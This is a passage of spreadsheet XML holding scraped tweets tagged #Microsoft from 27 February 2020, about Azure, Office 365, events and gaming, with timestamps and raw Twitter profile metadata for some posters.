    <t>#ICYMI Azure Cost Management + Billing updates  February 2020 https://t.co/vl2ZsMr4mh #Azure #Cloud #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 17:10:56 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/fj9GtM1EAh #microsoft #cloud #Virtual Machines https://t.co/FFskECZ6X8</t>
  </si>
  <si>
    <t>Thu Feb 27 17:10:52 +0000 2020</t>
  </si>
  <si>
    <t>I am the OG with Stacks. Stacks of floppies. Original @Microsoft @Windows 3, @Office Word, Excel, Access, Project, Works, and FoxPro, in low and high density. Installation was fun back then. Enjoy nerds! #Microsoft #floppy https://t.co/tVEdiPvTCf</t>
  </si>
  <si>
    <t>{'id': 201286884, 'id_str': '201286884', 'name': 'Vele Samak ðŸ‡²ðŸ‡°ðŸ‡ºðŸ‡¸', 'screen_name': 'vsamak', 'location': 'Skopje, Macedonia', 'description': 'Chief of Revenue for great machines aka @MIKROSAM, ex-FDI Minister, Tech, Marketing &amp; Finance, photographer, ex-Citi quant, MSFT, Wharton, UofChicago alum', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1690, 'friends_count': 254, 'listed_count': 20, 'created_at': 'Mon Oct 11 14:33:19 +0000 2010', 'favourites_count': 2519, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2512,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'http://pbs.twimg.com/profile_images/1617151708/sk-ma-2011-1843_resize_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1617151708/sk-ma-2011-1843_resize_normal.JPG', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/201286884/1348839439',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</si>
  <si>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17:10:51 +0000 2020</t>
  </si>
  <si>
    <t>DP PXEBoot Speed Up Tool Released for Configuration Manager - https://t.co/vtLmAUs38z #Guide #Microsoft #OSD #SCCM #IT #techblogger #mblogger #techygeekshome</t>
  </si>
  <si>
    <t>Thu Feb 27 17:09:21 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/gVf8w6BcgF #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 17:05:26 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/wdWxasn4Si #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 17:05:21 +0000 2020</t>
  </si>
  <si>
    <t>It's time to get personal in healthcare.
#PatientEngagement that drives change and better outcomes is rooted in personalization with self-configurable solutions. 
Meeting patient expectations with #AI.
#HIMSS20 #Azure #Microsoft @HIMSS @Health_IT
https://t.co/qwISGVSqo3</t>
  </si>
  <si>
    <t>Thu Feb 27 17:05:09 +0000 2020</t>
  </si>
  <si>
    <t>Today I will speak about #Azure here #microsoft #community #rzeszow https://t.co/Ad3SGofJ61</t>
  </si>
  <si>
    <t>Thu Feb 27 17:05:08 +0000 2020</t>
  </si>
  <si>
    <t>Noble goal to remove bias, but not easy. Do you think it is possible?
#AI #ArtificialIntelligence #MachineLearning #Microsoft #Satya
https://t.co/V64RWvLhGd</t>
  </si>
  <si>
    <t>Thu Feb 27 17:05:00 +0000 2020</t>
  </si>
  <si>
    <t>An insightful look at the highly topical story of corporate involvement in the digital #commons just out from @UniWestPress by @bjbirkin. And it's #openaccess now at https://t.co/PSlhmGQylH
#software #Microsoft #opensource https://t.co/dCGN4ED5Dg</t>
  </si>
  <si>
    <t>{'id': 2836930832, 'id_str': '2836930832', 'name': 'UniWestPress', 'screen_name': 'UniWestPress', 'location': 'Central London', 'description': 'We are an open access publisher of high quality, peer-reviewed, academic publications.', 'url': 'http://t.co/6kPvMez7Oe', 'entities': {'url': {'urls': [{'url': 'http://t.co/6kPvMez7Oe', 'expanded_url': 'http://www.uwestminsterpress.co.uk', 'display_url': 'uwestminsterpress.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 782, 'friends_count': 995, 'listed_count': 21, 'created_at': 'Wed Oct 01 16:41:51 +0000 2014', 'favourites_count': 240, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1082,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'http://pbs.twimg.com/profile_images/742325273262215168/siJW-lBW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/742325273262215168/siJW-lBW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2836930832/1465819177',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</si>
  <si>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17:04:50 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/FtwjpnwSzi</t>
  </si>
  <si>
    <t>Thu Feb 27 17:04:30 +0000 2020</t>
  </si>
  <si>
    <t>Great wireless experience. If you get this reduce the dead zones and use a tripod @hyperkin #gaming #gamedevelopment #gamedev #gamer #forzamotorsport7 #forzahorizon4 #xbox #xboxone #videogames #xboxone #gaminglife #gamedeveloper #gamedevlife #microsoft #gamestudio #hyperkin https://t.co/aQ0EmGlZmp</t>
  </si>
  <si>
    <t>{'id': 96660000, 'id_str': '96660000', 'name': 'AngelMex', 'screen_name': 'angelmexluis', 'location': '', 'description': 'Dev Lead at @ForzaMotorsport. Previously Dev Lead @Minecraft and @Xbox Avatars. Scale models builder. Artist by night. He/His. Opinions are my own.', 'url': 'https://t.co/xcud4nsccJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/xcud4nsccJ', 'expanded_url': 'http://angelmex.net', 'display_url': 'angelmex.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 262, 'friends_count': 233, 'listed_count': 2, 'created_at': 'Mon Dec 14 00:48:20 +0000 2009', 'favourites_count': 4840, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3407,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'http://pbs.twimg.com/profile_images/1136079095119265792/SwTZDECu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136079095119265792/SwTZDECu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/96660000/1569213329',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</si>
  <si>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17:04:10 +0000 2020</t>
  </si>
  <si>
    <t>Have a look at the Envision for Manufacturing event, organized by #Microsoft and how it brought business leader and peers together in breakout sessions. Read about our #CAS use cases here as well!
#Supplychainoptimisation #SaaS #Customs #Trade #C4T
https://t.co/Msulj7QIKN</t>
  </si>
  <si>
    <t>{'id': 2810178855, 'id_str': '2810178855', 'name': 'Customs4trade', 'screen_name': 'customs4trade', 'location': 'Mechelen', 'description': 'Customs4trade has a unique team of customs experts and technology engineers that have developed CAS, a software solution that automates customs compliance.', 'url': 'http://t.co/60Vmg55Wjk', 'entities': {'url': {'urls': [{'url': 'http://t.co/60Vmg55Wjk', 'expanded_url': 'http://www.customs4trade.com', 'display_url': 'customs4trade.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 120, 'friends_count': 228, 'listed_count': 0, 'created_at': 'Mon Oct 06 12:48:10 +0000 2014', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 180,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'http://pbs.twimg.com/profile_images/960829224092286977/gIamo3QS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/960829224092286977/gIamo3QS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2810178855/1565179342', 'profile_link_color': '1D70AA',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</si>
  <si>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17:03:21 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Cerberus Android Malware Can Bypass 2FA, Unlock Devices Remotely:" https://t.co/j8GWrMaE6E
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 17:02:49 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts Leon Butler dives deep into compliance with MS Teams at our exclusive event this evening at the Gherkin in London. #Compliance #Microsoft #NICE https://t.co/xREpzit2Jd</t>
  </si>
  <si>
    <t>Thu Feb 27 17:02:18 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft    VIA @office365    MS Defender ATP Threat and Vulnerability Management (video)  https://t.co/xju1ZoOkkj</t>
  </si>
  <si>
    <t>Thu Feb 27 17:02:13 +0000 2020</t>
  </si>
  <si>
    <t>On Demand Migration (ODM) - Learn How to configure Switch Mailboxes https://t.co/y3aU4V2uKK #Migration #Microsoft #Exchange #Office365 #Mailbox #ThursdayTips https://t.co/tFzA7Ae4eG</t>
  </si>
  <si>
    <t>Thu Feb 27 17:01:58 +0000 2020</t>
  </si>
  <si>
    <t>What's your favourite game you have played till now ? 
#Microsoft #PS4 #Windows #Sony #console #games</t>
  </si>
  <si>
    <t>{'id': 1064196861513342976, 'id_str': '1064196861513342976', 'name': 'PhoenixFromYoutube', 'screen_name': 'PhoenixFromYT', 'location': 'India', 'description': "It's PHOENIX here !\nWish me on ðŸŽ‚10 June !!!\nI really love #DemonSlayer #Anime\nðŸ˜ Tanjiro And Nezuko ðŸ˜", 'url': 'https://t.co/CAXf3JnDmy', 'entities': {'url': {'urls': [{'url': 'https://t.co/CAXf3JnDmy', 'expanded_url': 'http://www.youtube.com/c/PhoenixFromYoutube', 'display_url': 'youtube.com/c/PhoenixFromYâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 64, 'friends_count': 75, 'listed_count': 0, 'created_at': 'Sun Nov 18 16:41:18 +0000 2018', 'favourites_count': 5453, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1773, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230910071556567040/rz-TQUJP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230910071556567040/rz-TQUJP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1064196861513342976/1582306778',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</si>
  <si>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17:01:31 +0000 2020</t>
  </si>
  <si>
    <t>Webinar: Why its not enough to rely on Microsofts native capabilities for O365 data #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/cWAVjVNM3m</t>
  </si>
  <si>
    <t>Thu Feb 27 17:01:00 +0000 2020</t>
  </si>
  <si>
    <t>Rare gem  $MCCX  hired by $msft #Microsoft to handle all CX services this is HUGE! 7MILL float with high of 2.50!
$CYIO $KWBT $EMPM $EQLB  $TECR  $MYFT $ACRL $TTCM $ZMRK $ABCE $FONU $IGEX $OPTI $GGSM $KNOS $HENC $IQST $NSLPQ $GLTC $VRUS $PHIL $GHIL $NSAV $DRNK $CHIF $PBIO https://t.co/04lHhozobw</t>
  </si>
  <si>
    <t>{'id': 931053020737019904, 'id_str': '931053020737019904', 'name': 'Swing trades GURU', 'screen_name': 'swingtradesguru', 'location': 'Tallahassee, FL', 'description': 'Penny stock guru. Do your own DD', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 157, 'friends_count': 138, 'listed_count': 0, 'created_at': 'Thu Nov 16 06:55:13 +0000 2017', 'favourites_count': 466, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 655, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1158259786938343424/LBi-m0F7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158259786938343424/LBi-m0F7_normal.jpg',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</si>
  <si>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17:00:35 +0000 2020</t>
  </si>
  <si>
    <t>Atlas Cloud is a Silver Partner of #Microsoft, and therefore a trusted provider of their Office 365 products. We offer bespoke Office 365 business plans, so you can modify our services to suit your budget. https://t.co/DQcIHqWN08</t>
  </si>
  <si>
    <t>{'id': 309755689, 'id_str': '309755689', 'name': 'Atlas Cloud', 'screen_name': 'AtlasCloud', 'location': 'UK', 'description': 'IT for the modern workplace, because todayâ€™s technology should be super secure and flexible. Modernising apps, desktops, recovery plans and more.', 'url': 'https://t.co/ZX0trIxpGb', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZX0trIxpGb', 'expanded_url': 'http://www.atlascloud.co.uk', 'display_url': 'atlascloud.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2971, 'friends_count': 1508, 'listed_count': 182, 'created_at': 'Thu Jun 02 16:26:47 +0000 2011', 'favourites_count': 1149, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9775, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EEEEF0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/649880936260222976/nCQV8HUJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/649880936260222976/nCQV8HUJ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/309755689/1550065850', 'profile_link_color': '00AFBA',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</si>
  <si>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17:00:30 +0000 2020</t>
  </si>
  <si>
    <t>What's the difference between Office 365 and Office 2013? Try the #Microsoft #PowerPoint Presenter Coach!  Say No to Glossophobia and Enhance Your Public Speaking Skills https://t.co/kW2TE4VxiF</t>
  </si>
  <si>
    <t>{'id': 21962755, 'id_str': '21962755', 'name': 'peter lurie', 'screen_name': 'luriep', 'location': 'Boston, USA', 'description': 'Microsoft Surface GBB and technologist. #Challenger, #Infosec, #Cycling, #UComms, #Mentor, #BostonStrong. Father &amp; Husband. He/Him. Personal Acct.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 739, 'friends_count': 670, 'listed_count': 87, 'created_at': 'Thu Feb 26 03:10:34 +0000 2009', 'favourites_count': 1590, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7363,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'http://pbs.twimg.com/profile_images/1088294945302077440/d7KcKQm0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088294945302077440/d7KcKQm0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21962755/1426639771', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '4B1248', 'profile_text_color': '7F2B51', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 17:00:12 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/LCdkY3jIKf</t>
  </si>
  <si>
    <t>Thu Feb 27 17:00:06 +0000 2020</t>
  </si>
  <si>
    <t>Modern pages and web parts are designed to be responsive across devices, meaning that images used in web parts will scale differently based on the device. Learn more about what image sizes work best. https://t.co/QbL0QSOMEh
#microsoft #sharepoint #sharepointonline #office365 https://t.co/v6iHMfxLfi</t>
  </si>
  <si>
    <t>Thu Feb 27 17:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Check out this upcoming webinar with #TDWI, #Microsoft and #Qlik https://t.co/Oruf2P7ibz</t>
  </si>
  <si>
    <t>{'id': 869273556, 'id_str': '869273556', 'name': 'Lisa Kane', 'screen_name': 'LisaKaneAus', 'location': 'sydney', 'description': 'Regional Marketing Director for Qlik in Sydney', 'url': 'https://t.co/LItE1l9jdX', 'entities': {'url': {'urls': [{'url': 'https://t.co/LItE1l9jdX', 'expanded_url': 'http://www.qlik.com', 'display_url': 'qlik.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 293, 'friends_count': 365, 'listed_count': 37, 'created_at': 'Tue Oct 09 05:32:47 +0000 2012', 'favourites_count': 176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1117, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '121314', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1143267952575148032/H28yTMeh_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143267952575148032/H28yTMeh_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/869273556/1443435678', 'profile_link_color': '19CF86',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</si>
  <si>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Feb 27 16:57:38 +0000 2020</t>
  </si>
  <si>
    <t>First delivery for @Microsoft today in Manchester for their Power Platform Training Days. Had a great day teaching and what better way to do it than with @AzureRory . Sessions on PowerApps, PowerAutomate, PowerBi, CDS, Compliance and Governance.
 #Microsoft  #PowerPlatform https://t.co/bJ7w1c5Ljn</t>
  </si>
  <si>
    <t>Thu Feb 27 16:55:00 +0000 2020</t>
  </si>
  <si>
    <t>Update to the background image of the Office 365 sign-in screens https://t.co/QMGliql6hJ #Office365  #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 16:54:53 +0000 2020</t>
  </si>
  <si>
    <t>Focus on the #cloud 
Also because we will have new paths for #Microsoft certifications
https://t.co/521Yge0EVW
#SQLServer #DBA #Developer #SQL #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 16:52:02 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 16:51:57 +0000 2020</t>
  </si>
  <si>
    <t>#Update to the #BackgroundImage of #TheOffice 365 sign-in screens https://t.co/SXoRuYr7gp #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Thu Feb 27 16:51:26 +0000 2020</t>
  </si>
  <si>
    <t>#KPMG combines #CyberSecurity, #data management and industry experience with #Microsofts technology to help clients improve their business protection. https://t.co/he2Ayx3FBO</t>
  </si>
  <si>
    <t>{'id': 23053630, 'id_str': '23053630', 'name': 'Huck Chuah', 'screen_name': 'huckchuah', 'location': 'Naarden, Nederland', 'description': '@KPMG #InternalAudit, https://t.co/IsaMuFfWtD |Associate Programme Director, Lecturer @UvA RO Internal Audit | Supervisory Board @ELAA', 'url': 'https://t.co/5sjEDmg43k', 'entities': {'url': {'urls': [{'url': 'https://t.co/5sjEDmg43k', 'expanded_url': 'http://www.linkedin.com/in/huckchuah', 'display_url': 'linkedin.com/in/huckchuah', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/IsaMuFfWtD', 'expanded_url': 'https://bit.ly/2ICbVBq', 'display_url': 'bit.ly/2ICbVBq', 'indices': [22, 45]}]}}, 'protected': False, 'followers_count': 690, 'friends_count': 387, 'listed_count': 26, 'created_at': 'Fri Mar 06 11:18:05 +0000 2009', 'favourites_count': 149, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1310,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'http://pbs.twimg.com/profile_images/691991906990055424/JPLt4pBz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/691991906990055424/JPLt4pBz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23053630/1422312335',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</si>
  <si>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16:48:13 +0000 2020</t>
  </si>
  <si>
    <t>A month before @fsf announced it would compete with #proprietarysoftware #github -- a #microsoft trap --Thomas Grzybowskis explanation of why GitHub poses a risk to #softwarefreedom and what can be done about it https://t.co/g4sHXbzMXH</t>
  </si>
  <si>
    <t>Thu Feb 27 16:47:26 +0000 2020</t>
  </si>
  <si>
    <t>There is a simple way to explain one of the biggest threats to any organization's infrastructure. It's just one word: complexity. Fortunately, #Microsoft is making #IT simpler with a modern workplace.  https://t.co/FeSlmO0LPh</t>
  </si>
  <si>
    <t>{'id': 1019875060662882305, 'id_str': '1019875060662882305', 'name': 'N8 Solutions', 'screen_name': 'SolutionsN8', 'location': 'Kenosha, WI', 'description': 'We partner with small and medium-sized #professionalservices organizations to deliver best-in-class #technology solutions and\n #IT support. #lawfirms #legalit', 'url': 'https://t.co/bmsKKOQ5nn', 'entities': {'url': {'urls': [{'url': 'https://t.co/bmsKKOQ5nn', 'expanded_url': 'http://www.n8its.com', 'display_url': 'n8its.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 98, 'friends_count': 128, 'listed_count': 2, 'created_at': 'Thu Jul 19 09:22:17 +0000 2018', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 573,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'http://pbs.twimg.com/profile_images/1019875483234848768/TRg3KR9O_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1019875483234848768/TRg3KR9O_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1019875060662882305/1531992286',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</si>
  <si>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16:47:19 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 is an enterprise-grade complex IT service with a large number of moving
parts. Here's how you can leverage it without the headaches  https://t.co/BDDiFfsfOc
#Microsoft #ITsupport #Office365</t>
  </si>
  <si>
    <t>Thu Feb 27 16:47:16 +0000 2020</t>
  </si>
  <si>
    <t>Update to the background image of the Office 365 sign-in screens https://t.co/NeaiAkkgJt #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 16:45:54 +0000 2020</t>
  </si>
  <si>
    <t>Get #scalable #storage without breaking the bank. Try an agile #platform to meet your needs. https://t.co/Y5OrBsHsmG #azure #microsoft #cloud https://t.co/JXvn43CP7R</t>
  </si>
  <si>
    <t>Thu Feb 27 16:45:00 +0000 2020</t>
  </si>
  <si>
    <t>THE FIRST EPISODE IS ALMOST HERE! Check out the NEW Channel 9 Show #LessCodeMorePower launching at 9am PST Tomorrow!
Look who @donasarkar and I have as our first guest! The gentleman who is @KeithWhatling 
#LessCodeMorePower #powerplatform #powerapps @ch9 #microsoft https://t.co/4YdcmEIVQc</t>
  </si>
  <si>
    <t>Thu Feb 27 16:44:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Excel - Excel from Beginner to Advanced #Udemy
Preview This Course GET COUPON CODE =&amp;gt; https://t.co/g48dNpPTjd
#100DaysOfCode #Programming #DataAnalytics #machinelearning #ad #JavaScript #HTML5 #VueJS #javascript30 #reactjs #Angular #CSS #PHP #Nodejs #Python</t>
  </si>
  <si>
    <t>{'id': 1157165923070951424, 'id_str': '1157165923070951424', 'name': 'Free Code Coupon', 'screen_name': 'freecodecoupon', 'location': '', 'description': '#Udemy, udemy coupon, udemyoff, udemy free, udemy courses, udemy free course, udemy free coupon #udemy certificate, #udemycoupon, #udemyfree', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 132, 'friends_count': 0, 'listed_count': 4, 'created_at': 'Fri Aug 02 05:47:09 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 791, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1157166726796103680/q1qGAi2C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157166726796103680/q1qGAi2C_normal.jpg',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</si>
  <si>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16:43:37 +0000 2020</t>
  </si>
  <si>
    <t>Yes, you get fired for buying #microsoft
#MicrosoftTim reports: https://t.co/9YkWpa3qXR</t>
  </si>
  <si>
    <t>Thu Feb 27 16:42:57 +0000 2020</t>
  </si>
  <si>
    <t>Why did no one tell me that there is a Windows Sandbox as a feature inside Windows 10? 
#Windows #Microsoft #Sandbox https://t.co/iYXbhHsXbd</t>
  </si>
  <si>
    <t>{'id': 155564717, 'id_str': '155564717', 'name': 'Senad MeÅ¡kin', 'screen_name': 'senadmeskin', 'location': 'BiH, FBiH, Bugojno', 'description': 'SO - https://t.co/JNuEn0Czjm Linkedin: https://t.co/mbwEOgkjIj Youtube: https://t.co/HymTaBiRKR GitHub: https://t.co/DfPV6GIV94', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/JNuEn0Czjm', 'expanded_url': 'https://goo.gl/ju1kaN', 'display_url': 'goo.gl/ju1kaN', 'indices': [5, 28]}, {'url': 'https://t.co/mbwEOgkjIj', 'expanded_url': 'https://goo.gl/UQJ899', 'display_url': 'goo.gl/UQJ899', 'indices': [39, 62]}, {'url': 'https://t.co/HymTaBiRKR', 'expanded_url': 'https://goo.gl/h8wwt2', 'display_url': 'goo.gl/h8wwt2', 'indices': [72, 95]}, {'url': 'https://t.co/DfPV6GIV94', 'expanded_url': 'https://github.com/senad-meskin', 'display_url': 'github.com/senad-meskin', 'indices': [104, 127]}]}}, 'protected': False, 'followers_count': 242, 'friends_count': 160, 'listed_count': 14, 'created_at': 'Mon Jun 14 13:49:57 +0000 2010', 'favourites_count': 678, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3711,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'http://pbs.twimg.com/profile_images/1065609174690787331/72BHGsfp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1065609174690787331/72BHGsfp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/155564717/1540411760',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</si>
  <si>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16:42:21 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure
- simplifies cloud migration for traditional applications running on IBM Power while minimizing disruption to the business
https://t.co/3SEN8rU9tY
#Azure #Microsoft #Cloud #Strategy #IBMPower #Migration #SkytapOnAzure https://t.co/iLdDc0ye2r</t>
  </si>
  <si>
    <t>Thu Feb 27 16:39:16 +0000 2020</t>
  </si>
  <si>
    <t>Things don't always go as planned, you need to be smart about it
Saving money help you become financially secure and provide a landing page in case of any emergency 
#Velvotng #microsoft #bitcoin #CoronavirusOutbreak #YeniCorollaHatchback #ONVIDEOPARTY #_ # https://t.co/0ISH5FekmF</t>
  </si>
  <si>
    <t>Thu Feb 27 16:39:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Explains the Fate of #SMB1: Microsoft has not completely scrubbed Windows of Server Message Block 1 (SMB1), the company said this week, counter to its previously stated plans. https://t.co/2y1WXmIEiq</t>
  </si>
  <si>
    <t>Thu Feb 27 16:37:12 +0000 2020</t>
  </si>
  <si>
    <t>Backup Explorer now available in preview
https://t.co/ttE77PDgZz 
#Microsoft #azure #cloud #clouds #cloudsecurity #networking  #issquared  #hybridcloud  #data #monitor https://t.co/lduQ4ZoxlG</t>
  </si>
  <si>
    <t>Thu Feb 27 16:36:23 +0000 2020</t>
  </si>
  <si>
    <t>#Kvashuk #Microsoft #Ukraine 
CryptoPotato: Former Microsoft Employee Found Guilty For Stealing $10M And Laundering With Bitcoin.
https://t.co/d5AIkXR2Bh</t>
  </si>
  <si>
    <t>{'id': 1641669223, 'id_str': '1641669223', 'name': 'Agape (Angel With A Shotgun)', 'screen_name': 'anathymadevice', 'location': 'Annwn', 'description': 'Wife, weirdo, musician, seeker, and NSFW. Yin and yang and Every Shade of Grey. WARNING! Not PC. Affiliated with no religion. Has Opinions!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 922, 'friends_count': 2237, 'listed_count': 19, 'created_at': 'Sat Aug 03 00:22:55 +0000 2013', 'favourites_count': 210164, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 90842,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'http://pbs.twimg.com/profile_images/1212789760340586496/aoScdVx8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212789760340586496/aoScdVx8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1641669223/1582906728',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</si>
  <si>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16:35:57 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft: #Coronavirus To Put Damper on Windows Business: Microsoft's third-quarter results will likely take a hit from the global coronavirus emergency and its impact on the supply chain, Microsoft warned investors this week. https://t.co/zxFJe1izuo</t>
  </si>
  <si>
    <t>Thu Feb 27 16:34:00 +0000 2020</t>
  </si>
  <si>
    <t>Advancing safe deployment practices
https://t.co/PSRMYNCcsh 
#Microsoft #Azure #deployment #software #cloud #clouds #technology #cloudcomputing #server #issquared</t>
  </si>
  <si>
    <t>Thu Feb 27 16:32:52 +0000 2020</t>
  </si>
  <si>
    <t>#EdTech #microsoft     73% of teachers report working in classrooms with student reading levels that span four or more grade levels. That's why it's so important to provide a personalized learning experience for each student. #Office365 https://t.co/xYvUrNh25E</t>
  </si>
  <si>
    <t>Thu Feb 27 16:32:50 +0000 2020</t>
  </si>
  <si>
    <t>Join us for the Microsoft Teams Live Events Webcast! We start in 30 minutes!!  #microsoft #microsoftteams https://t.co/1MovmfRDAs</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</si>
  <si>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33088, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 62432,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</si>
  <si>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Feb 27 16:32:41 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure  https://t.co/3OGVDDy7br #Microsoft #Azure #AzureFamily</t>
  </si>
  <si>
    <t>Thu Feb 27 16:32:25 +0000 2020</t>
  </si>
  <si>
